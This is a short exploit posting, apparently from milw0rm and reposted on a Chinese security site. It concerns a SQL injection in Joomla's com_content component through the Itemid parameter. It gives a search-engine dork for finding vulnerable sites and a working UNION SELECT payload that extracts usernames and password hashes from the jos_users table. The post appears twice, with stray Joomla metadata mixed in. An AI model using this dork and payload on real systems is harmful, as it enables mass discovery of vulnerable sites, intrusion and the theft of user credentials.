Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln
-------------------------------------------------------------------------------------------
Joomla Component com_content SQL Injection Vulnerabity
-------------------------------------------------------------------------------------------
Author : unknown_styler
Dork : inurl:com_content
POC : http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL}
Example : http://localhost/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999 union select 1,concat_ws(0x3a,username,password),3,4,5 from jos_users/*
------------------------------------------------------------------------------------------------------------------------------------
Greetings : h4ck-y0u.org
side note:
Página de contenido
Projecte Joomla!
July 2004
(C) 2005 Open Source Matters. All rights reserved.
http://www.gnu.org/copyleft/gpl.html GNU/GPL
admin@joomla.org
www.joomla.org
1.0.0
# milw0rm.com [2008-07-08]
Joomla Component com_content SQL Injection Vulnerabity
-------------------------------------------------------------------------------------------
Author : unknown_styler
Dork : inurl:com_content
POC : http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL}
Example : http://localhost/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999 union select 1,concat_ws(0x3a,username,password),3,4,5 from jos_users/*
------------------------------------------------------------------------------------------------------------------------------------
Greetings : h4ck-y0u.org
side note:
# milw0rm.com [2008-07-08]
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
本文地址:/websafe/Exploit/149389.html